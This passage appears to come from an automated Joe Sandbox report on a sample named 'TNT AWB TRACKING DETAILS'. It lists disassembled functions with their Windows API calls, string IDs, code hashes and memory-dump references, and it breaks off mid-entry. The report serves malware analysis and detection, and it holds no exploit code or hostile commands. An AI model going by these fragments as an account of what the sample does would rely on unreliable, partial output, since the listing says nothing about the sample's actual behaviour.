                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Library$AddressFreeLoadProc
                                      • String ID: AU3_GetPluginDetails
                                      • API String ID: 145871493-4132174516
                                      • Opcode ID: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                                      • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                                      • Opcode Fuzzy Hash: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                                      • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                                      Function 00450D6B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window
                                      • String ID: SysMonthCal32
                                      • API String ID: 2326795674-1439706946
                                      • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                      • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                                      • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                      • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                                      Function 004509D8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97COMMON
                                      Download Yara Rule
                                      APIs
                                      • DestroyWindow.USER32(00000000), ref: 00450A2F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: DestroyWindow
                                      • String ID: msctls_updown32
                                      • API String ID: 3375834691-2298589950
                                      • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                      • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                                      • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                      • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                                      Function 0044DC13 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 95COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _memmove
                                      • String ID: $<
                                      • API String ID: 4104443479-428540627
                                      • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                      • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                                      • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                      • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                                      Function 0045D779 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ErrorMode$DiskFreeSpace
                                      • String ID: \VH
                                      • API String ID: 1682464887-234962358
                                      • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                      • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                                      • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                      • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                                      Function 0045D78F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ErrorMode$DiskFreeSpace
                                      • String ID: \VH
                                      • API String ID: 1682464887-234962358
                                      • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                      • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                                      • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                      • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                                      Function 0045D86D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ErrorMode$DiskFreeSpace
                                      • String ID: \VH
                                      • API String ID: 1682464887-234962358
                                      • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                      • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                                      • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                      • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                                      Function 0045D36D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                                      • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ErrorMode$InformationVolume
                                      • String ID: \VH
                                      • API String ID: 2507767853-234962358
                                      • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                      • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                                      • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                      • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                                      Function 0045D53E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                                      • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ErrorMode$InformationVolume
                                      • String ID: \VH
                                      • API String ID: 2507767853-234962358
                                      • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                      • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                                      • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                      • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                                      Function 00450ACC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                                      • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: msctls_trackbar32
                                      • API String ID: 3850602802-1010561917
                                      • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                      • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                                      • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                      • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                                      Function 00435215 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                      • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                                      • String ID: crts
                                      • API String ID: 943502515-3724388283
                                      • Opcode ID: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                                      • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                                      • Opcode Fuzzy Hash: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                                      • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                                      Function 0045D2C7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                                      • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                                      • SetErrorMode.KERNEL32(?), ref: 0045D35C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ErrorMode$LabelVolume
                                      • String ID: \VH
                                      • API String ID: 2006950084-234962358
                                      • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                      • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                                      • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                      • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                                      Function 004496E9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                      • GetMenuItemInfoW.USER32 ref: 00449727
                                      • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                                      • DrawMenuBar.USER32 ref: 00449761
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Menu$InfoItem$Draw_malloc
                                      • String ID: 0
                                      • API String ID: 772068139-4108050209
                                      • Opcode ID: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                                      • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                                      • Opcode Fuzzy Hash: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                                      • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                                      Function 00472A2B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _wcslen$_wcscpy
                                      • String ID: 3, 3, 8, 1
                                      • API String ID: 3469035223-357260408
                                      • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                      • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                                      • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                      • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                                      Function 004312CC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                                      • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: ICMP.DLL$IcmpCloseHandle
                                      • API String ID: 2574300362-3530519716
                                      • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                      • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                                      • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                      • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                                      Function 004312FE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                      • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
